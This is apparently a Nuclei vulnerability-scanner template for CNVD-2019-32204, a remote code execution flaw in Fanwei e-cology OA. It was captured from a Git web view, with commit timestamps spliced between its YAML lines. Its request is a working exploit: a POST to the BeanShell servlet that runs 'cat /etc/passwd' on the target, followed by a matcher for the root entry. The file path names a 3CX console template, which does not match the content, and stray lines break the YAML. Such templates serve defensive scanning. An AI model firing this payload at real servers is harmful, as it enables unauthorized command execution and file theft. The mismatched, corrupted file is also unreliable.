nuclei-templates/vulnerabilities/other/3cx-management-console.yaml

27 lines
938 B
YAML
Raw Normal View History

id: CNVD-2019-32204
# AAAAAAAA
2022-04-02 10:54:05 +00:00
info:
name: Fanwei e-cology <= 9.0 Remote Code Execution
author: daffainfo
severity: critical
description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
reference:
- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
tags: fanwei,cnvd,cnvd2019,rce
2022-04-02 10:54:05 +00:00
requests:
- raw:
- |
POST /bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-04-06 04:00:14 +00:00
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
2022-04-02 10:54:05 +00:00
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2022-04-06 04:00:14 +00:00
# Enhanced by cs on 2022/05/06